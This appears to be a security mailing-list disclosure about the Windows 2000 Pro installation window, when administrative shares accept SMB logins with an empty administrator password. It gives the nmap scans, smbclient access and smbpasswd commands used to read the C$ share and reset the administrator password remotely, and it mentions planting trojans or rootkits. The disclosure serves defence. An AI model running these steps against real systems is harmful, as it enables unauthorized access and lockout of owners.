Re: Windows 2000 installation process weakness

[Stephane.Aubert () HSC FR (Stephane Aubert)]

Hello,

As a lot of people asked me information on the unsecure win2k pro
installation process, we wish to bring further information on this
vulnerability.

All these tests have been made and checked with Denis Ducamp and
Alain Thivillon, 2 serious security experts.

What we have done :

  1. Install the final release of win2k pro (build 2195)

  2. Do not give any IP address during the install. If no DHCP server
     is responding the win2k pro box take 169.254.153.13 as IP address.
    (The address range used is 169.254.0.0/16, which is registered
    with the IANA as the LINKLOCAL net.)

  Notice : if a real IP address is given by the admin or a DCHP server
  you can connect directely, and jump to step 4 right now.

  3. On your favorit Linux (or *BSD) box add an alias to the interface :
     # ifconfig eth0:0 169.254.153.11

  4. Just after the configuration of COM+ by win2k you can ping or scan it :

     % nmap 169.254.153.13
     Starting nmap V. 2.3BETA10 by Fyodor (fyodor () dhp com, www.insecure.org/nmap/)
     Interesting ports on  (169.254.153.13):
     Port    State       Protocol  Service
     139     open        tcp       netbios-ssn

     # nmap  -sU -p 1-200 169.254.153.13
     Starting nmap V. 2.3BETA10 by Fyodor (fyodor () dhp com, www.insecure.org/nmap/)
     Interesting ports on  (169.254.153.13):
     Port    State       Protocol  Service
     137     open        udp       netbios-ns
     138     open        udp       netbios-dgm

  Notice : the administrtor have already entered a password !!!

  5. By now, you can connect via SMB (smbclient for example)
     to the C$ or ADMIN$ share WITHOUT ANY PASSWORD !!!

     This until win2k asked the admin to reboot the computer.

     Notice : it's possible to use NAT (netbios auditing tool)
     to obtain the netbios name of the windows box and the shares.

     % ./smbclient //groar/c$ -I 169.254.153.13 -U administrator
     added interface ip=169.254.153.12 bcast=169.254.153.31 nmask=255.255.255.224
     Password: <EMPTY>
     Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
     smb: \> ls
      IO.SYS                            HSR    40992  Tue May 31 06:22:00 1994
      MSDOS.SYS                         HSR    38166  Tue May 31 06:22:00 1994
      COMMAND.COM                         R    56286  Tue May 31 06:22:00 1994
      WINA20.386                          A     9349  Tue May 31 06:22:00 1994
      CONFIG.SYS                          A      638  Fri Feb 18 15:34:00 2000
      AUTOEXEC.BAT                        A      690  Fri Feb 18 15:33:10 2000

  6. Worse !
     You can SET (remotly) a new administrator password :

     % ./smbpasswd -U administrator -r groar
     Old SMB password: <EMPTY>
     New SMB password: <NEWPASS>
     Retype new SMB password: <NEWPASS>
     startsmbfilepwent: unable to open file /usr/local/samba/private/smbpasswd
     unable to open smb password database.
     Password changed for user administrator.

    By now, nobody - even the administrator - even after the reboot - can
    connect (remote nor local) without the NEW password.

    The administrator have to crack his own computer ;-))

  7. Worse !
     It is also (evidence) possible to transfert a trojan on the new
     computer or just a rootkit (www.rootkit.com) in order to keep
     administrator privileges for a long time :(

Regards,
Stéphane

--
Stephane AUBERT                   -=-      Herve Schauer Consultants
Stephane.Aubert () hsc fr                            http://www.hsc.fr/